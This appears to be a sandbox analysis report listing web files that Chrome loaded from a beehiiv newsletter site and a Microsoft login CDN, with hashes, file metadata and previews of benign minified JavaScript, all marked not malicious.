                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSPrNyO/xRTsMs7BOXEMN4XyFPUXQPZLkrPeNrnVrp7VC7N:JWkETrNyO/DX7NBZZFrnVr3C7N
                                                                                                                                            MD5:3D515E496D75E42A655FB6CE3643F2E9
                                                                                                                                            SHA1:42C38593341E4E0C34791F7ED9A21375505F53B3
                                                                                                                                            SHA-256:62BB8BA3766CD1DDE008B6FCF60C87BD65B41104EB44817C20E37C130F9B534E
                                                                                                                                            SHA-512:903E0D23883D2B4684D2DD8377C12D0D784E1C8C9559617F669908E6CE09DB908CD3A586F26434874874625A47FEE58BD980430EA77BF19CAEC0F08DAD8DA9EB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fd77d185-6d6e-5555-b201-070d4e61cd72")}catch(e){}}();.import{r as e,u as g,a as p}from"./index-D6da9p6-.js";const b=({isInitialLoadFromSwarm:d,publicationId:u})=>{const[t]=e.useState(d),[l,f]=e.useState(null),[h,I]=e.useState(null),s=g(),n=p(),i=n.pathname+n.search,c=n.search.includes("version=draft");e.useEffect(()=>{!t&&c&&s(".",{replace:!0})},[s,t,c]);const r=e.useCallback(function(){s(i,{replace:!0})},[s,i]);return e.useEffect(()=>{const o=m=>{const{data:a}=m;a?.publicationId===u&&t&&(a?.status==="refresh"&&r(),f(a?.sectionId),I(a?.nodeId))};return window.addEventListener("message",o),()=>{window.removeEventListener("message",o)}},[r,t]),{highlightedSectionId:l,highlightedNodeId:h}};export{b as u};.//# sourceMappingURL=useWebBuilderCommunicator-DoXoLq6Y.js.map..//# debugId=fd
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (47520)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):47521
                                                                                                                                            Entropy (8bit):5.3981340461317835
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                                                                                            MD5:7C92EC9D1395055CE0405A32607C7291
                                                                                                                                            SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                                                                                            SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                                                                                            SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (480)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):849
                                                                                                                                            Entropy (8bit):5.436596954404387
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuS+skON2f6nXkVn71oi7IyhntrhR1kv:JWkE8ONAsXkVn71fnD8v
                                                                                                                                            MD5:23026D017832435ADDCC4BC038756E4D
                                                                                                                                            SHA1:0385CCC0BC5BA3F8782D7415F50629A192A14AC1
                                                                                                                                            SHA-256:F9F3F2C2623F3050D63CAFF5E1A602031DD8408DB7BE2C35108C80F7288F469C
                                                                                                                                            SHA-512:3B6241DBB1825AF9180FF02636BEAAFDCEFA2A40880C2E5AF7E78777D873E49919720B26C16A0C9C697A246B0326C782594427C1A9403C44FAC73D96CC2E0F3C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c256683a-32de-5256-b02a-20dbdd192806")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function a({title:r,titleId:t,...o},n){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"m8.25 4.5 7.5 7.5-7.5 7.5"}))}const s=e.forwardRef(a);export{s as F};.//# sourceMappingURL=ChevronRightIcon-Dsmk2epM.js.map..//# debugId=c256683a-32de-5256-b02a-20dbdd192806.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3329)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3697
                                                                                                                                            Entropy (8bit):5.093372328942918
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QwdT2aF4CEZAiiK2YSBasZBtDWK14N4eZj3v:zT7nEZ8/tD5yNLZr
                                                                                                                                            MD5:AE94431438551F0411BCE6FB6BD6B3D2
                                                                                                                                            SHA1:1407A6D6AF0FE3A379F8BF55B2FC09E8ABD399D7
                                                                                                                                            SHA-256:D71079235BA474E147650A4F63B709495307A99A78E9C431A6C25EAC97767352
                                                                                                                                            SHA-512:9FDAA2CEA0B73291DEF6A5B8872D80C294E2F5B841FA9FC669F7130785CD199E4F4F63DF0750436F7A913EBB7D806DC89ECA0F367D65F0027013C60D2821E5DC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/WebThemeContext-DttfuZxo.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="35752e2a-081f-5d35-833c-fdc527e12edb")}catch(e){}}();.import{j as n}from"./jsx-runtime-BjG_zV1W.js";import{r}from"./index-D6da9p6-.js";const O={0:"opacity-0",10:"opacity-10",20:"opacity-20",30:"opacity-30",40:"opacity-40",50:"opacity-50",60:"opacity-60",70:"opacity-70",80:"opacity-80",90:"opacity-90",100:"opacity-100"},f={none:"p-0",sm:"p-4 sm:px-8 sm:py-8",md:"p-4 sm:px-16 sm:py-12",lg:"p-4 sm:px-24 sm:py-16"},d={none:"shadow-none",xs:"shadow-xs",sm:"shadow-sm",md:"shadow-md",lg:"shadow-lg",xl:"shadow-xl"},b={none:"rounded-none",xs:"rounded-xs",sm:"rounded-sm",md:"rounded-md",lg:"rounded-lg",xl:"rounded-xl","2xl":"rounded-2xl","3xl":"rounded-3xl"},l={xs:"border",sm:"border-2",md:"border-4",lg:"border-8"},c={xs:"border-t",sm:"border-t-2",md:"border-t-4",lg:"border-t-8"},i={xs:"bo
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (8768), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):8768
                                                                                                                                            Entropy (8bit):5.757087009188751
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:jGFLggDmm91AzkXhjLv08GHcSpwmVEDqoirkLqUt98Uukv:qFcpA4qpLvMHcRsoO0981C
                                                                                                                                            MD5:92E06186193B13F9A2559E80F45CE86E
                                                                                                                                            SHA1:5BCCF3723205396FE17C10CD7E79E0DC8771C89A
                                                                                                                                            SHA-256:FD573D08E4159C258694A40EE91DAE10D9E08741773B08D1D63DE54EEACCCCA9
                                                                                                                                            SHA-512:08B47F69CB4BC2CC41CC97F1A3F9CC51A2F4049125D6A6A13D1573FA3EB6E0BBDB5E9D36B486DD9BF02511FE09F02585B84DA9A6A4E2F66389EEFB4896208A76
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/e0c90b6a3ed1/main.js?
                                                                                                                                            Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,l,s,v){W=b,function(c,e,V,f,g){for(V=b,f=c();!![];)try{if(g=-parseInt(V(490))/1+-parseInt(V(444))/2*(-parseInt(V(532))/3)+parseInt(V(462))/4*(parseInt(V(451))/5)+-parseInt(V(422))/6*(-parseInt(V(486))/7)+-parseInt(V(431))/8*(parseInt(V(529))/9)+parseInt(V(436))/10+-parseInt(V(494))/11,g===e)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,910381),h=this||self,i=h[W(518)],j=function(X,e,f,g){return X=W,e=String[X(463)],f={'h':function(E){return E==null?'':f.g(E,6,function(F,Y){return Y=b,Y(485)[Y(459)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,E==null)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(537)];R+=1)if(S=E[Z(459)](R),Object[Z(441)][Z(512)][Z(433)](I,S)||(I[S]=M++,J[S]=!0),T=K+S,Object[Z(441)][Z(512)][Z(433)](I,T))K=T;else{if(Object[Z(441)][Z(512)][Z(433)](J,K)){if(256>K[Z(455)](0)){for(H=0;H<N;P<<=1,F-1==Q?(Q=0,O[Z(521)](G(P)),P=0):Q++,H++);for(U=K[Z(455)](0),H=0;8>H;P=P<<1.37|1.6
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):644
                                                                                                                                            Entropy (8bit):5.530049014371309
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuS7GC1FENwcpakn9X467kXyOXXgC1z:UgqHHVvCaRuS7GC1FENtak9qXyOgC1z
                                                                                                                                            MD5:A41AB733D882553B95F56DEB91F13391
                                                                                                                                            SHA1:4124FE4E946697BE55D1DA1E92A88E5B2A113D99
                                                                                                                                            SHA-256:E05769DC04AB675BB9AF66936716C66A4B1C02F9E47DB449C1F4DC89CBA7E1FA
                                                                                                                                            SHA-512:A5DBD88FC0187E5223885B1D137FC56E0798FA16E6B4BC51AB707EC5966C8526EEC39C551894973A6A3E2084A47F5CCC64DD994ACF2715DDD38027AC3D72CF9C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="96af6a21-d0b5-5eb3-aada-6630dd5334d1")}catch(e){}}();.import{j as n}from"./jsx-runtime-BjG_zV1W.js";import{a as r}from"./index-D6da9p6-.js";const c=({value:t,redirectToHome:a=!1})=>{const e=r(),o=a?`/${e.search}`:`${e.pathname}${e.search}`;return n.jsx("input",{type:"hidden",name:"redirect_to",value:t||o})};export{c as R};.//# sourceMappingURL=RedirectToHiddenInput-mUb4yii7.js.map..//# debugId=96af6a21-d0b5-5eb3-aada-6630dd5334d1.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1600)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1971
                                                                                                                                            Entropy (8bit):5.472641443168121
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE1N5a04qWXBZd+kRPt79o8sRYX4x1aSnFvENBJQjfQ:Qc0hGPPP7zsRYox1fFdQ
                                                                                                                                            MD5:0B716D4AD7EF31CAA9D7F2630AEC0799
                                                                                                                                            SHA1:C9B045705D442675374FEDFD2AACA00E41F2F990
                                                                                                                                            SHA-256:2028371835BD542CF5899A8A10EE2E234B8C745D5F4C491E3B1FE0EA9F5725C1
                                                                                                                                            SHA-512:25EA92393250F523D7D65772FCCB22FA1AC730902D03927FF44EC8D9D990AAA07B5FEBE72E7DB9F6AD8237FAAA05A709614604B422DE5E2ECC16BCEFBD61825D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/useSignupRedirects-DpD4LtfX.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f527bf8a-8d5a-561c-8da5-5db1f8fdccf7")}catch(e){}}();.import{u as _,a as P,r as x}from"./index-D6da9p6-.js";import{L as u}from"./PageProvider-uKxoiNdl.js";import{u as w}from"./components-Oj2xMfGE.js";const C=f=>{const t=_(),S=P(),[e,g]=x.useState(),[R]=w(),h=e?e?.redirects?.length:0,E=(e?e?.currentIndex+1:0)/h*100,r=()=>{localStorage.removeItem(u.SIGNUP_REDIRECTS)};return x.useEffect(()=>{const s=localStorage.getItem(u.SIGNUP_REDIRECTS);if(s){const c=JSON.parse(s).startedAt,n=new Date(c).getTime(),i=new Date().getTime()-n,d=1e3*60*3;i>d?r():g(JSON.parse(s))}else e&&g(void 0)},[S]),x.useEffect(()=>{if(e){const s=e.redirects.map(a=>a.href),p=S.pathname,c=!s.includes(p),n=R.get("recommendations")==="true";c&&!n&&(r(),g(void 0))}},[e]),{currentStep:e?.redirects?.[e?.currentIndex],nex
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (480)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):849
                                                                                                                                            Entropy (8bit):5.436596954404387
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuS+skON2f6nXkVn71oi7IyhntrhR1kv:JWkE8ONAsXkVn71fnD8v
                                                                                                                                            MD5:23026D017832435ADDCC4BC038756E4D
                                                                                                                                            SHA1:0385CCC0BC5BA3F8782D7415F50629A192A14AC1
                                                                                                                                            SHA-256:F9F3F2C2623F3050D63CAFF5E1A602031DD8408DB7BE2C35108C80F7288F469C
                                                                                                                                            SHA-512:3B6241DBB1825AF9180FF02636BEAAFDCEFA2A40880C2E5AF7E78777D873E49919720B26C16A0C9C697A246B0326C782594427C1A9403C44FAC73D96CC2E0F3C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/ChevronRightIcon-Dsmk2epM.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c256683a-32de-5256-b02a-20dbdd192806")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function a({title:r,titleId:t,...o},n){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"m8.25 4.5 7.5 7.5-7.5 7.5"}))}const s=e.forwardRef(a);export{s as F};.//# sourceMappingURL=ChevronRightIcon-Dsmk2epM.js.map..//# debugId=c256683a-32de-5256-b02a-20dbdd192806.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (970)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):228537
                                                                                                                                            Entropy (8bit):5.02173469574849
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:AWmukRDl1ejLbjAdTyxLRv5vg0ApXLCNiSfkCSZruSwfsWX9EMFo1nk0wizYvTGV:IRp1ejLbjAdTyxLHgbdWkCUBWX9yz
                                                                                                                                            MD5:CD03911052383485F2522418FB20AB8E
                                                                                                                                            SHA1:9F7C5FD8E506ED3DB199E16772E76E25B1A6034B
                                                                                                                                            SHA-256:F0470A79A5E403A0A778F693CAFB19D845D55313E3A10F6C0EE2296A9D608B23
                                                                                                                                            SHA-512:2A40C2B3D14087224C6AB3B64006B68047714014FBF7517550961A97925A50B7AAA0FFF5720B4A5D43A5CCC71AF0CE59924581F5732F9A8FD2F403AEC432AD0F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/entry.worker.js
                                                                                                                                            Preview:var __defProp = Object.defineProperty;.var __defNormalProp = (obj, key, value) => key in obj ? __defProp(obj, key, { enumerable: true, configurable: true, writable: true, value }) : obj[key] = value;.var __publicField = (obj, key, value) => {. __defNormalProp(obj, typeof key !== "symbol" ? key + "" : key, value);. return value;.};.function _mergeNamespaces(n, m) {. for (var i = 0; i < m.length; i++) {. const e = m[i];. if (typeof e !== "string" && !Array.isArray(e)) {. for (const k in e) {. if (k !== "default" && !(k in n)) {. const d = Object.getOwnPropertyDescriptor(e, k);. if (d) {. Object.defineProperty(n, k, d.get ? d : {. enumerable: true,. get: () => e[k]. });. }. }. }. }. }. return Object.freeze(Object.defineProperty(n, Symbol.toStringTag, { value: "Module" }));.}.const _Logger = class _Logger {. constructor(o) {. __publicField(this, "options");. __publicField
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (510)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):868
                                                                                                                                            Entropy (8bit):5.511541539450466
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSuuNCaDA9X2qKvbR3BHHNMi6sqP:JWkEjN1DA9X2Xvb736F
                                                                                                                                            MD5:B2B166EFE10F98FBFFDAF49CC2815ACE
                                                                                                                                            SHA1:257BBBB5003056F437185891865F275797748597
                                                                                                                                            SHA-256:CEA70605C7B965CB1CDDAF71C70040D4E914219C57587BB6E9E06079B51F95E0
                                                                                                                                            SHA-512:E9B9D55F086BFA0908488D3226FCE1318F5A9CB43BDD616C88FA2A46693638F3664B858D70432E6447B7ECA30F72E774BCA050B1DCE4B882088DF3635D8BB990
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-pnFxOaac.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5707660c-17e2-5dcd-8bda-553c824ef04b")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{$ as l,a as o}from"./index-COqk5b7U.js";import{c as t}from"./index-x2da_zcv.js";const m=({currentProgress:r=60,variant:a="post"})=>{const s=a==="reward"?"border border-gray-200 relative overflow-hidden rounded-full w-full h-4":"relative overflow-hidden h-1.5 bg-transparent w-full";return e.jsx(l,{className:s,value:r,children:e.jsx(o,{className:t("h-full w-full bg-wt-primary",a==="signup-flow"&&"transition-all"),style:{width:`${r}%`}})})};export{m as P};.//# sourceMappingURL=index-pnFxOaac.js.map..//# debugId=5707660c-17e2-5dcd-8bda-553c824ef04b.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (4053)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4621
                                                                                                                                            Entropy (8bit):5.373055159968663
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QTQCy8z+rTC0C2Rse8Lf64/piDdyfSA1kO8r56MvpW4MBmqJwRWH:iQCyFrTC0C2RKT64/U+Z1wpQ4MBlwS
                                                                                                                                            MD5:D2E1C0131FAA15487A1BCF9DF88647C5
                                                                                                                                            SHA1:56E87BFD56C0616A9DDEFCB6CFD4316C88F0CC5A
                                                                                                                                            SHA-256:6F1121C76A0CB54C9CF040288BE272D7AC7ED7E11D6137E640C7CB5B9B54869D
                                                                                                                                            SHA-512:A06170037F07BF4F0C0E2AA6AF71F8B77F699298C34A4437408B73C0CA0954C54BF20FCAA10633BA81EE8BB8923780CA4D74FE5DF3DECFF4903E782F253460B4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9608f3cb-02a3-5a46-9c88-098c61e68b74")}catch(e){}}();.import{r as o}from"./index-D6da9p6-.js";import"./components-Oj2xMfGE.js";function d(){return d=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var n=arguments[r];for(var t in n)Object.prototype.hasOwnProperty.call(n,t)&&(e[t]=n[t])}return e},d.apply(this,arguments)}function w(e,r=[]){let n=[];function t(s,l){const c=o.createContext(l),i=n.length;n=[...n,l];function f($){const{scope:u,children:x,...p}=$,y=u?.[e][i]||c,V=o.useMemo(()=>p,Object.values(p));return o.createElement(y.Provider,{value:V},x)}function h($,u){const x=u?.[e][i]||c,p=o.useContext(x);if(p)return p;if(l!==void 0)return l;throw new Error(`\`${$}\` must be used within \`${s}\``)}return f.displayName=s+"Provider",[f,h]}const a=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (4277)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4640
                                                                                                                                            Entropy (8bit):5.378093745473255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QhdRN0eHgUYSyd+SqHLq4GXpY7+7UtXbG8XhBlCGRIYrPhQ:QDISyHqH/Kpk+UtaUhBQGRIuPhQ
                                                                                                                                            MD5:6C6BF9C773BD02502B100B9DF3B34AC8
                                                                                                                                            SHA1:FD2304FC4C7D9C5F1532ADCC4D35ED39B223D71B
                                                                                                                                            SHA-256:C45E9B52737091B1638F3216C7DAAD57309AFEF6DE9A8268EE3A7AD0A27F43FA
                                                                                                                                            SHA-512:1430DF5C22963AA62D52A82577C0E7CFACB1E9F9D9C7D5E341241A418BF3F1B60978738985D77B88CA7358D32CB29E5242EF9E05B48BDF7F14B6AE56AA2212B1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cbac7ffb-cf38-5e5b-b466-98be60764a11")}catch(e){}}();.import{e as b,r as n}from"./index-D6da9p6-.js";import{O as B,U as E,y as T,c as A,o as g,u as $,C as R,I as K,d as L,a as k,T as F}from"./keyboard-CaEu2o0u.js";import{s as N,d as v,u as H}from"./transition-y-5XFFuu.js";import{r as j}from"./bugs-DVQzBh-s.js";import{o as Q}from"./use-is-mounted-BaHv16bB.js";var M;let V=(M=b.startTransition)!=null?M:function(e){e()};var Y=(e=>(e[e.Open=0]="Open",e[e.Closed=1]="Closed",e))(Y||{}),Z=(e=>(e[e.ToggleDisclosure=0]="ToggleDisclosure",e[e.CloseDisclosure=1]="CloseDisclosure",e[e.SetButtonId=2]="SetButtonId",e[e.SetPanelId=3]="SetPanelId",e[e.LinkPanel=4]="LinkPanel",e[e.UnlinkPanel=5]="UnlinkPanel",e))(Z||{});let _={0:e=>({...e,disclosureState:$(e.disclosureState,{0:1,1:0})}),1:e=>e.dis
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (31550)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64195
                                                                                                                                            Entropy (8bit):5.298149732253655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lhhCkW8z8HHXIrKR9sAP4jX4booExTF9t0LogqGVZLMU37dPKsl1gvr:RcXIrKR9PQjX4soEf2VZIU37dLor
                                                                                                                                            MD5:4E7AEDE94DAFB84AC4C147C35C045EB8
                                                                                                                                            SHA1:FC6C27057C42068DA11744E310C8A3920635AD92
                                                                                                                                            SHA-256:826A52CF721B2E2F4B4C57F85F01C651F3474FCA9E894F486BEA523D10C2236F
                                                                                                                                            SHA-512:8878444C41F10B91D669CCE919420B3901AA6D242B19023FA08DBEB42895013133D7FD692BF411BDA5AC475F59F4285DD006D9A20536B2ADB72FBE64E0CF0BB4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f7a0b46c-c6e2-545b-a1e5-f4e6dbf6d5e1")}catch(e){}}();.function Xr(e,t){for(var r=0;r<t.length;r++){const n=t[r];if(typeof n!="string"&&!Array.isArray(n)){for(const a in n)if(a!=="default"&&!(a in e)){const l=Object.getOwnPropertyDescriptor(n,a);l&&Object.defineProperty(e,a,l.get?l:{enumerable:!0,get:()=>n[a]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var Da=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function Qr(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}var pr={exports:{}},L={};/**. * @license React. * react.production.js. *. * Copyright (c) Meta Platforms, Inc. and affiliates.. *. * This source code is licensed under the MIT li
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):5525
                                                                                                                                            Entropy (8bit):7.961202222662501
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                                                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
